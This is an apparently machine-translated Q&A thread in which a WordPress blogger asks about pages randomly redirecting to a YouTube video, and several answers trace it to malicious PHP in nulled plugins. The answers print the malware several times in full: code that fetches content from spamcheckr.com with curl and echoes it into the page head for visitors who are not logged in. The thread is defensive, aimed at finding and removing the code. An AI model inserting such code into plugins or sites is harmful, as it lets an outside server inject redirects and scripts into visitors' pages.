感染HTML刷新元標記的WordPress博客

Question

您好，StackOverflow社區。今天我有一個非常有趣的（在我看來）感染與你分享。

4-5天前，我意識到我的博客的主頁加載幾秒鐘後被重定向到另一頁。在Justin Bieber視頻中特別針對youtube。我認爲這是我的電腦問題，所以我掃描了病毒和惡意軟件。但這不是我的錯。

最後我確定這不是一個本地問題，因爲Google pagespeed的見解具有相同的結果。

因此，經過數小時的研究（以及一些破損的鍵盤）後，我發現了這些線索。具體爲：

<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA"> 

首先，我禁用了所有我的插件，但沒有結果：

meta標籤是我的頭相似，這裏面產生。一段時間後，問題仍然存在。 其次，我搜索了我所有的數據庫表，看看視頻的URL是否包含在某個地方，但事實並非如此。 然後我在我的模板編輯器中逐個搜索php文件，但沒有任何結果。 。htaccess也很清楚（不是100％確定我在那裏找什麼，但我認爲沒有什麼可疑的）。

畢竟，我通過FTP下載了我的整個網站，並在每個文件中搜索這個URL。我發現它被包含在CACHE文件夾的一些HTML文件中。爲此，我使用W3 Total Cache。我刪除了整個緩存文件夾，但一段時間後問題仍然存在。

這裏有趣的事實是，這種「病毒」並不總是有效的。它隨機出現在每次不同的頁面。今天晚上，我意識到它出現在第二臺電腦上，同時我的電腦上的一切都很好。

YouTube視頻的網址是：http：// www.youtube.com/watch?v=RFngSCaY5nA

所以我的問題是：是否有人對你有一個解決方案刪除整個安裝和啓動前推薦從一開始就？過去有沒有其他人對我有過同樣的問題？

我認爲這都是我必須分享的。我對這篇長文章感到抱歉，儘可能詳盡地儘量詳​​細。我不擅長編碼，這是我第一次嘗試運行WordPress網站，所以可能有些東西我忘了。

在此先感謝。

Answer 1

我有同樣的問題，並認爲我找到了解決方案！ 檢查您的網站文件的鏈接：http://spamcheckr.com/l.php 我發現這個鏈接在formcraft插件。

像這樣：

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} 

編輯： 同時檢查是否存在這樣的：http://spamcheckr.com/req.php

Answer 2

好上面的回答。要添加到它，我建議用grep的人誰麻煩搜索代碼：

grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content 

如果你沒有grep和無法訪問您的服務器（Windows用戶）下載或使用FINDSTR：

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content 

（不要忘記更改/ WWW/WordPress的/可溼性粉劑內容

Answer 3

我發現在WordPress的插件fooboxV2這個腳本的位置，或者你的WordPress的文件夾。（FooBox） 插件官方網址是http://fooplugins.com/plugins/foobox/

這是腳本文件路徑 /wp-content/plugins/fooboxV2/includes/foolic_class.php

你可以看到整個腳本commented.But我發現在註釋的代碼的代碼。

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?> 

Answer 4

如果您使用的是Gravity Forms的無效版本，您可能也會遇到此重定向問題。爲了解決這個問題去/plugins/gravityforms/settings/setting.php並刪除下面的代碼：

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?> 

好運。

Answer 5

也找到了。在我的情況下，我使用了一個明顯無效的插件（我沒有意識到）。它被稱爲woocommerce-checkout-field-editor，並注入了一個Justin Bieber YouTube視頻的鏈接。

功能看起來是這樣的，並藏在\可溼性粉劑內容\插件\ woocommerce結帳場編輯器\資產\ JS \ class.php：

if (mt_rand(0,99) == 1) { 
function sec_check() { 
    if(function_exists('curl_init'))  
    { 
     $url = "spamcheckr.com/req.php"; 
     $ch = curl_init(); 
     $timeout = 5; 
     curl_setopt($ch,CURLOPT_URL,$url); 
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
     $data = curl_exec($ch); 
     curl_close($ch); 
     echo "$data"; 
    } 
} 
add_action('wp_head','sec_check'); 

}

由於我們可以看到，它只在隨機函數命中'1'時才顯示垃圾郵件。然後，它禮貌地詢問是否安裝了curl，然後向垃圾郵件服務器發送一個簡單的GET請求，以查看它應該注入的代碼。

該網站爲spamcheckr.com。

然後，它將自己添加到WordPress標題中，並重定向頁面的查看器。

我向現場報告了他們的主人，讓我們看看會發生什麼。